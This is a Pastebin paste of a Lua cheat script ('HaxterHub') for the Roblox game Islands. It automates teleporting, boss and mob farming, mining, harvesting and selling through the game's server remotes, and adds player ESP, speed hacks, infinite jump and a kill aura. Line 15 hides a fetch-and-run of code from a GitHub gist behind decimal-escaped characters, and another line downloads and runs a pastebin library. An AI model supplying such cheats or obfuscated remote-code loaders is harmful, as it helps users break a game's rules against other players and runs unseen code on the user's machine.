Advertisement
sdfjfjes

Islands scripts

Aug 10th, 2022
1,536
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.62 KB | None | 0 0
  1. game.StarterGui:SetCore("SendNotification", {
  2. Title = "HaxterHub!";
  3. Text = "Successfully Executed!";
  4. Icon = "http://www.roblox.com/asset/?id=9680636205";
  5. Duration = 5;
  6. Callback = bindableFunction;
  7. Button1 = "Like";
  8. Button2 = "Dislike";
  9. })
  10.  
  11. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(701, 196, -211)
  12. wait(2)
  13. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1187, 379, 110)
  14. wait(2)
  15. loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
  16.  
  17. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1495, 338, -699)
  18. wait(3)
  19. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1021, 295, -1771)
  20.  
  21.  
  22. local vermLib = loadstring(game:HttpGet("https://pastebin.com/raw/NQj0ffUL"))()
  23.  
  24. local window = vermLib:CreateWindow()
  25. local main = window:CreateTab("main", "Bosses", "") -- framename, threadname, author
  26. local Mobs = window:CreateTab("Mobs", "mobs", "")
  27. local Ore = window:CreateTab("Ore", "Ore", "") -- framename, threadname, author
  28. local Farming = window:CreateTab("Farming", "Farming", "") -- framename, threadname, author
  29. local SpiritFarm = window:CreateTab("SpiritFarm", "SpiritFarm", "") -- framename, threadname, author
  30. local Teleports = window:CreateTab("Teleports", "Teleports", "") -- framename, threadname, author
  31. local Mods = window:CreateTab("Mods", "Mods", "") -- framename, threadname, author
  32.  
  33. main:CreateToggle("Slimeking", function(state) -- togglename, callback
  34. getgenv().autofarm = state
  35. while true do
  36. if not getgenv().autofarm then return end
  37. while wait(0.3) do
  38. function teleportto(placeCFrame)
  39. local plr = game.Players.LocalPlayer;
  40. if plr.Character then
  41. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,10,0)
  42. end
  43. end
  44.  
  45. teleportto(game:GetService("Workspace").WildernessIsland.Entities.slimeKing.HumanoidRootPart.CFrame)
  46. local args = {
  47. [1] = {
  48. ["crit"] = false,
  49. ["hitUnit"] = workspace.WildernessIsland.Entities.slimeKing
  50. }
  51. }
  52.  
  53. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  54.  
  55. end
  56. end
  57. end)
  58.  
  59.  
  60. main:CreateToggle("Kor", function(state) -- togglename, callback
  61. getgenv().autofarm = state
  62. while true do
  63. if not getgenv().autofarm then return end
  64. wait(0.1)
  65. function teleportto(placeCFrame)
  66. local plr = game.Players.LocalPlayer;
  67. if plr.Character then
  68. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  69. end
  70. end
  71.  
  72. teleportto(game:GetService("Workspace").WildernessIsland.Entities.golem.HumanoidRootPart.CFrame)
  73. local args = {
  74. [1] = {
  75. ["crit"] = false,
  76. ["hitUnit"] = workspace.WildernessIsland.Entities.golem
  77. }
  78. }
  79.  
  80. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  81.  
  82. end
  83. end)
  84.  
  85. main:CreateToggle("Wizard Boss", function(state) -- togglename, callback
  86. getgenv().autofarm = state
  87. while true do
  88. if not getgenv().autofarm then return end
  89. wait(0.1)
  90. function teleportto(placeCFrame)
  91. local plr = game.Players.LocalPlayer;
  92. if plr.Character then
  93. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  94. end
  95. end
  96.  
  97. function teleportto(placeCFrame)
  98. local plr = game.Players.LocalPlayer;
  99. if plr.Character then
  100. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  101. end
  102. end
  103.  
  104. teleportto(game:GetService("Workspace").WildernessIsland.Entities.wizardBoss.HumanoidRootPart.CFrame)
  105. local args = {
  106. [1] = {
  107. ["crit"] = false,
  108. ["hitUnit"] = workspace.WildernessIsland.Entities.wizardBoss
  109. }
  110. }
  111.  
  112. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  113. end
  114. end)
  115. main:CreateToggle("Bhaa", function(state) -- togglename, callback
  116. getgenv().autofarm = state
  117. while true do
  118. if not getgenv().autofarm then return end
  119. wait(0.1)
  120. function teleportto(placeCFrame)
  121. local plr = game.Players.LocalPlayer;
  122. if plr.Character then
  123. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  124. end
  125. end
  126.  
  127. teleportto(game:GetService("Workspace").WildernessIsland.Entities.desertBoss.HumanoidRootPart.CFrame)
  128. local args = {
  129. [1] = {
  130. ["crit"] = false,
  131. ["hitUnit"] = workspace.WildernessIsland.Entities.desertBoss
  132. }
  133. }
  134.  
  135. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  136. end
  137. end)
  138. main:CreateToggle("Dragon", function(state) -- togglename, callback
  139. getgenv().autofarm = state
  140. while true do
  141. if not getgenv().autofarm then return end
  142. wait(0.2)
  143. function teleportto(placeCFrame)
  144. local plr = game.Players.LocalPlayer;
  145. if plr.Character then
  146. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  147. end
  148. end
  149.  
  150. teleportto(game:GetService("Workspace").WildernessIsland.Entities.magmaDragon.HumanoidRootPart.CFrame)
  151. local args = {
  152. [1] = {
  153. ["crit"] = false,
  154. ["hitUnit"] = workspace.WildernessIsland.Entities.magmaDragon
  155. }
  156. }
  157.  
  158. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  159.  
  160. end
  161. end)
  162.  
  163. Mobs:CreateToggle("Slime", function(state) -- togglename, callback
  164. getgenv().autofarm = state
  165. while true do
  166. if not getgenv().autofarm then return end
  167. wait(0.1)
  168. function teleportto(placeCFrame)
  169. local plr = game.Players.LocalPlayer;
  170. if plr.Character then
  171. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  172. end
  173. end
  174.  
  175. teleportto(game:GetService("Workspace").WildernessIsland.Entities.slime.HumanoidRootPart.CFrame)
  176. local args = {
  177. [1] = {
  178. ["crit"] = false,
  179. ["hitUnit"] = workspace.WildernessIsland.Entities.slime
  180. }
  181. }
  182.  
  183. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  184. end
  185. end)
  186. Mobs:CreateToggle("Buffalkor", function(state) -- togglename, callback
  187. getgenv().autofarm = state
  188. while true do
  189. if not getgenv().autofarm then return end
  190. wait(0.2)
  191. function teleportto(placeCFrame)
  192. local plr = game.Players.LocalPlayer;
  193. if plr.Character then
  194. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  195. end
  196. end
  197.  
  198. teleportto(game:GetService("Workspace").WildernessIsland.Entities.buffalkor.HumanoidRootPart.CFrame)
  199.  
  200. local args = {
  201. [1] = {
  202. ["crit"] = false,
  203. ["hitUnit"] = workspace.WildernessIsland.Entities.buffalkor
  204. }
  205. }
  206.  
  207. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  208. end
  209. end)
  210. Mobs:CreateToggle("RockMimic", function(state) -- togglename, callback
  211. getgenv().autofarm = state
  212. while true do
  213. if not getgenv().autofarm then return end
  214. wait()
  215. function teleportto(placeCFrame)
  216. local plr = game.Players.LocalPlayer;
  217. if plr.Character then
  218. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  219. end
  220. end
  221.  
  222. teleportto(game:GetService("Workspace").WildernessIsland.Entities.rockMimic.rock_monster_mesh.CFrame)
  223. local args = {
  224. [1] = {
  225. ["crit"] = false,
  226. ["hitUnit"] = workspace.WildernessIsland.Entities.rockMimic
  227. }
  228. }
  229.  
  230. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  231. end
  232. end)
  233. Mobs:CreateToggle("Lizards", function(state) -- togglename, callback
  234. getgenv().autofarm = state
  235. while true do
  236. if not getgenv().autofarm then return end
  237. wait()
  238. function teleportto(placeCFrame)
  239. local plr = game.Players.LocalPlayer;
  240. if plr.Character then
  241. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  242. end
  243. end
  244.  
  245. function teleportto(placeCFrame)
  246. local plr = game.Players.LocalPlayer;
  247. if plr.Character then
  248. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  249. end
  250. end
  251.  
  252. teleportto(game:GetService("Workspace").WildernessIsland.Entities.wizardLizard.HumanoidRootPart.CFrame)
  253.  
  254. local args = {
  255. [1] = {
  256. ["crit"] = false,
  257. ["hitUnit"] = workspace.WildernessIsland.Entities.wizardLizard
  258. }
  259. }
  260.  
  261. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  262. end
  263. end)
  264. Mobs:CreateToggle("Iron Skorp", function(state) -- togglename, callback
  265. getgenv().autofarm = state
  266. while true do
  267. if not getgenv().autofarm then return end
  268. wait()
  269. function teleportto(placeCFrame)
  270. local plr = game.Players.LocalPlayer;
  271. if plr.Character then
  272. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  273. end
  274. end
  275.  
  276. teleportto(game:GetService("Workspace").WildernessIsland.Entities.skorpIron.HumanoidRootPart.CFrame)
  277. local args = {
  278. [1] = {
  279. ["crit"] = false,
  280. ["hitUnit"] = workspace.WildernessIsland.Entities.skorpIron
  281. }
  282. }
  283.  
  284. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  285. end
  286. end)
  287. Mobs:CreateToggle("Gold Skorp", function(state) -- togglename, callback
  288. getgenv().autofarm = state
  289. while true do
  290. if not getgenv().autofarm then return end
  291. wait()
  292. function teleportto(placeCFrame)
  293. local plr = game.Players.LocalPlayer;
  294. if plr.Character then
  295. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  296. end
  297. end
  298.  
  299. teleportto(game:GetService("Workspace").WildernessIsland.Entities.skorpGold.HumanoidRootPart.CFrame)
  300. local args = {
  301. [1] = {
  302. ["crit"] = false,
  303. ["hitUnit"] = workspace.WildernessIsland.Entities.skorpGold
  304. }
  305. }
  306.  
  307. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  308. end
  309. end)
  310. Mobs:CreateToggle("Ruby Skorp", function(state) -- togglename, callback
  311. getgenv().autofarm = state
  312. while true do
  313. if not getgenv().autofarm then return end
  314. wait()
  315. function teleportto(placeCFrame)
  316. local plr = game.Players.LocalPlayer;
  317. if plr.Character then
  318. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  319. end
  320. end
  321.  
  322. teleportto(game:GetService("Workspace").WildernessIsland.Entities.skorpRuby.HumanoidRootPart.CFrame)
  323. local args = {
  324. [1] = {
  325. ["crit"] = false,
  326. ["hitUnit"] = workspace.WildernessIsland.Entities.skorpRuby
  327. }
  328. }
  329.  
  330. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  331. end
  332. end)
  333.  
  334. Mobs:CreateToggle("Blobs", function(state) -- togglename, callback
  335. getgenv().autofarm = state
  336. while true do
  337. if not getgenv().autofarm then return end
  338. wait()
  339. function teleportto(placeCFrame)
  340. local plr = game.Players.LocalPlayer;
  341. if plr.Character then
  342. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  343. end
  344. end
  345.  
  346. teleportto(game:GetService("Workspace").WildernessIsland.Entities.magmaBlob.HumanoidRootPart.CFrame)
  347. local args = {
  348. [1] = {
  349. ["crit"] = false,
  350. ["hitUnit"] = workspace.WildernessIsland.Entities.magmaBlob
  351. }
  352. }
  353.  
  354. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  355. end
  356. end)
  357. Orelist = {"Iron","Electrite","Stone","Coal","Gold","Andesite","Clay","Diamond","Opal","DiamondEnchanted"}
  358.  
  359. local dropdown = Ore:CreateDropdown("Ore", Orelist, function(CurrentOption) -- dropdownname, list, callback
  360. Ore = nil
  361. Ore = CurrentOption
  362. end)
  363.  
  364. dropdown:Refresh(Orelist) -- refresh dropdown with new options
  365. Ore:CreateToggle("Farm Ore", function(state) -- togglename, callback
  366. getgenv().autofarm = state
  367. while true do
  368. if not getgenv().autofarm then return end
  369. local rock = game:GetService("Workspace").WildernessBlocks:FindFirstChild("rock"..Ore)
  370. if rock ~= nil then
  371. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = rock.CFrame + Vector3.new(0,1,0)
  372. local A_1 =
  373. {
  374. ["player_tracking_category"] = "join_from_web",
  375. ["part"] = rock["1"],
  376. ["block"] = rock,
  377. ["norm"] = Vector3.new(0,0,0),
  378. ["pos"] = rock.Position
  379. }
  380. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_BLOCK_HIT_REQUEST"]
  381. Event:InvokeServer(A_1)
  382. end
  383. wait()
  384. end
  385. end)
  386. Farmlist = {"berry","blueberry","lol","lol","none"}
  387.  
  388. local dropdown = Farming:CreateDropdown("Choose To Farm", Farmlist, function(CurrentOption) -- dropdownname, list, callback
  389. Farming = nil
  390. Farming = CurrentOption
  391. end)
  392.  
  393. dropdown:Refresh(Farmlist) -- refresh dropdown with new options
  394. Farming:CreateToggle("Start Farm", function(state) -- togglename, callback
  395. getgenv().autofarm = state
  396. while true do
  397. if not getgenv().autofarm then return end
  398. local Bush = game:GetService("Workspace").WildernessBlocks:FindFirstChild("Bush"..harvest)
  399. if Bush ~= nil then
  400. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = Bush.CFrame + Vector3.new(0,1,0)
  401. local args = {
  402. [1] = {
  403. ["player"] = game:GetService("Players").LocalPlayer,
  404. ["player_tracking_category"] = "join_from_web",
  405. ["model"] = workspace.Islands:FindFirstChild("54ff3df8-f0de-4b9e-b6b3-152df961fe16-island").Blocks.Bush
  406. }
  407. }
  408.  
  409. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_HARVEST_CROP_REQUEST:InvokeServer(unpack(args))
  410. end
  411. wait()
  412. end
  413. end)
  414.  
  415.  
  416. SpiritFarm:CreateToggle("Farm Spirit", function(state) -- togglename, callback
  417. getgenv().autofarm = state
  418. while true do
  419. if not getgenv().autofarm then return end
  420. wait()
  421. function teleportto(placeCFrame)
  422. local plr = game.Players.LocalPlayer;
  423. if plr.Character then
  424. plr.Character.HumanoidRootPart.CFrame = placeCFrame + Vector3.new(0,1,0)
  425. end
  426. end
  427.  
  428. teleportto(game:GetService("Workspace").WildernessIsland.Entities.spirit.Bigspirit1.CFrame)
  429. local args = {
  430. [1] = {
  431. ["entity"] = getNil("spirit", "Model")
  432. }
  433. }
  434.  
  435. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_CATCH_INSECT:InvokeServer(unpack(args))
  436. end
  437. end)
  438.  
  439. Teleports:CreateButton("Slime Summon", function() -- buttonname, callback
  440. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(726, 167, 140)
  441. end)
  442.  
  443.  
  444. Teleports:CreateButton("Kor Summon", function() -- buttonname, callback
  445. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(2867, 285, 1177)
  446. end)
  447.  
  448. Teleports:CreateButton("Wizard Summon", function() -- buttonname, callback
  449. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(1805, 412, -990)
  450. end)
  451.  
  452. Teleports:CreateButton("Bhaa Summon", function() -- buttonname, callback
  453. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(644, 309, -2075)
  454. end)
  455.  
  456. Teleports:CreateButton("Dragon Summon", function() -- buttonname, callback
  457. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-9196, 407, -1402)
  458. end)
  459.  
  460. Mods:CreateToggle("Esp", function(state) -- buttonname, callback
  461. getgenv().autofarm = state
  462. if not getgenv().autofarm then return end
  463. local esp_settings = { ---- table for esp settings
  464. textsize = 20,
  465. colour = 255,255,255
  466. }
  467.  
  468. local gui = Instance.new("BillboardGui")
  469. local esp = Instance.new("TextLabel",gui) ---- new instances to make the billboard gui and the textlabel
  470.  
  471.  
  472.  
  473. gui.Name = "Cracked esp"; ---- properties of the esp
  474. gui.ResetOnSpawn = false
  475. gui.AlwaysOnTop = true;
  476. gui.LightInfluence = 0;
  477. gui.Size = UDim2.new(1.75, 0, 1.75, 0);
  478. esp.BackgroundColor3 = Color3.fromRGB(255, 255, 255);
  479. esp.Text = ""
  480. esp.Size = UDim2.new(0.0001, 0.00001, 0.0001, 0.00001);
  481. esp.BorderSizePixel = 4;
  482. esp.BorderColor3 = Color3.new(esp_settings.colour)
  483. esp.BorderSizePixel = 0
  484. esp.Font = "GothamSemibold"
  485. esp.TextSize = esp_settings.textsize
  486. esp.TextColor3 = Color3.fromRGB(esp_settings.colour) -- text colour
  487.  
  488. game:GetService("RunService").RenderStepped:Connect(function() ---- loops faster than a while loop :)
  489. for i,v in pairs (game:GetService("Players"):GetPlayers()) do
  490. if v ~= game:GetService("Players").LocalPlayer and v.Character.Head:FindFirstChild("Cracked esp")==nil then -- craeting checks for team check, local player etc
  491. esp.Text = ""..v.Name..""
  492. gui:Clone().Parent = v.Character.Head
  493. end
  494. end
  495. end)
  496. end)
  497. Mods:CreateToggle("Speed", function(state) -- buttonname, callback
  498. getgenv().autofarm = state
  499. while true do
  500. wait()
  501. if not getgenv().autofarm then return end
  502. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 100
  503. end
  504. end)
  505.  
  506. Mods:CreateToggle("Infinite jump", function(state) -- buttonname, callback
  507. getgenv().autofarm = state
  508. if not getgenv().autofarm then return
  509. end
  510. game:GetService("UserInputService").JumpRequest:connect(function() do
  511. game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
  512.  
  513. end
  514. end)
  515. end)
  516.  
  517. Mods:CreateToggle("Kill Aura", function(state) -- buttonname, callback
  518. game:GetService("RunService").RenderStepped:Connect(function(state) ---- loops faster than a while loop :)
  519. getgenv().autofarm = state
  520. if not getgenv().autofarm then return
  521. end local args = {
  522. [1] = {
  523. ["crit"] = false,
  524. ["hitUnit"] = workspace.WildernessIsland.Entities.slimeKing
  525. }
  526. }
  527.  
  528. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  529. local args = {
  530. [1] = {
  531. ["crit"] = false,
  532. ["hitUnit"] = workspace.WildernessIsland.Entities.golem
  533. }
  534. }
  535.  
  536. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  537. local args = {
  538. [1] = {
  539. ["crit"] = false,
  540. ["hitUnit"] = workspace.WildernessIsland.Entities.wizardBoss
  541. }
  542. }
  543.  
  544. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  545. local args = {
  546. [1] = {
  547. ["crit"] = false,
  548. ["hitUnit"] = workspace.WildernessIsland.Entities.desertBoss
  549. }
  550. }
  551.  
  552. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  553. local args = {
  554. [1] = {
  555. ["crit"] = false,
  556. ["hitUnit"] = workspace.WildernessIsland.Entities.magmaDragon
  557. }
  558. }
  559.  
  560. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  561. local args = {
  562. [1] = {
  563. ["crit"] = false,
  564. ["hitUnit"] = workspace.WildernessIsland.Entities.slime
  565. }
  566. }
  567.  
  568. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  569. local args = {
  570. [1] = {
  571. ["crit"] = false,
  572. ["hitUnit"] = workspace.WildernessIsland.Entities.buffalkor
  573. }
  574. }
  575.  
  576. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  577. local args = {
  578. [1] = {
  579. ["crit"] = false,
  580. ["hitUnit"] = workspace.WildernessIsland.Entities.rockMimic
  581. }
  582. }
  583.  
  584. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  585. local args = {
  586. [1] = {
  587. ["crit"] = false,
  588. ["hitUnit"] = workspace.WildernessIsland.Entities.wizardLizard
  589. }
  590. }
  591.  
  592. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  593. local args = {
  594. [1] = {
  595. ["crit"] = false,
  596. ["hitUnit"] = workspace.WildernessIsland.Entities.skorpIron
  597. }
  598. }
  599.  
  600. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  601. local args = {
  602. [1] = {
  603. ["crit"] = false,
  604. ["hitUnit"] = workspace.WildernessIsland.Entities.skorpGold
  605. }
  606. }
  607.  
  608. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  609. local args = {
  610. [1] = {
  611. ["crit"] = false,
  612. ["hitUnit"] = workspace.WildernessIsland.Entities.skorpRuby
  613. }
  614. }
  615.  
  616. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  617. local args = {
  618. [1] = {
  619. ["crit"] = false,
  620. ["hitUnit"] = workspace.WildernessIsland.Entities.magmaBlob
  621. }
  622. }
  623.  
  624. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_SWING_SWORD:InvokeServer(unpack(args))
  625.  
  626.  
  627. end)
  628.  
  629. end)
  630.  
  631.  
  632. Mods:CreateToggle("Auto Sell", function(state) -- buttonname, callback
  633. getgenv().autofarm = state
  634. if not getgenv().autofarm then return end
  635. while wait() do
  636. local args = {
  637. [1] = {
  638. ["merchant"] = "cropSell",
  639. ["offerId"] = 1,
  640. ["amount"] = all
  641. }
  642. }
  643.  
  644. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_MERCHANT_ORDER_REQUEST:InvokeServer(unpack(args))
  645. wait()
  646. local args = {
  647. [1] = {
  648. ["merchant"] = "cropSell",
  649. ["offerId"] = 50,
  650. ["amount"] = all
  651. }
  652. }
  653.  
  654. game:GetService("ReplicatedStorage").rbxts_include.node_modules.net.out._NetManaged.CLIENT_MERCHANT_ORDER_REQUEST:InvokeServer(unpack(args))
  655. wait()
  656.  
  657.  
  658. local A_1 =
  659. {
  660. ["merchant"] = "cropSell",
  661. ["offerId"] = 2,
  662. ["amount"] = all
  663. }
  664. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  665. Event:InvokeServer(A_1)
  666. wait()
  667. -- Script generated by R2Sv2
  668. -- R2Sv2 developed by Luckyxero
  669.  
  670. local A_1 =
  671. {
  672. ["merchant"] = "cropSell",
  673. ["offerId"] = 3,
  674. ["amount"] = all
  675. }
  676. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  677. Event:InvokeServer(A_1)
  678. wait()
  679. local A_1 =
  680. {
  681. ["merchant"] = "cropSell",
  682. ["offerId"] = 6,
  683. ["amount"] = all
  684. }
  685. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  686. Event:InvokeServer(A_1)
  687. wait()
  688. local A_1 =
  689. {
  690. ["merchant"] = "cropSell",
  691. ["offerId"] = 7,
  692. ["amount"] = all
  693. }
  694. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  695. Event:InvokeServer(A_1)
  696. wait()
  697. local A_1 =
  698. {
  699. ["merchant"] = "cropSell",
  700. ["offerId"] = 8,
  701. ["amount"] = all
  702. }
  703. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  704. Event:InvokeServer(A_1)
  705. wait()
  706. local A_1 =
  707. {
  708. ["merchant"] = "cropSell",
  709. ["offerId"] = 9,
  710. ["amount"] = all
  711. }
  712. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  713. Event:InvokeServer(A_1)
  714. wait()
  715. local A_1 =
  716. {
  717. ["merchant"] = "cropSell",
  718. ["offerId"] = 10,
  719. ["amount"] = all
  720. }
  721. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  722. Event:InvokeServer(A_1)
  723. wait()
  724. local A_1 =
  725. {
  726. ["merchant"] = "cropSell",
  727. ["offerId"] = 11,
  728. ["amount"] = all
  729. }
  730. local Event = game:GetService("ReplicatedStorage")["rbxts_include"]["node_modules"].net.out["_NetManaged"]["CLIENT_MERCHANT_ORDER_REQUEST"]
  731. Event:InvokeServer(A_1)
  732. wait()
  733. end
  734. end)
  735.  
  736. game.StarterGui:SetCore("SendNotification", {
  737. Title = "HaxterHub!";
  738. Text = "Successfully Loaded!";
  739. Icon = "http://www.roblox.com/asset/?id=9680636205";
  740. Duration = 5;
  741. Callback = bindableFunction;
  742. Button1 = "Like";
  743. Button2 = "Dislike";
  744. })
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement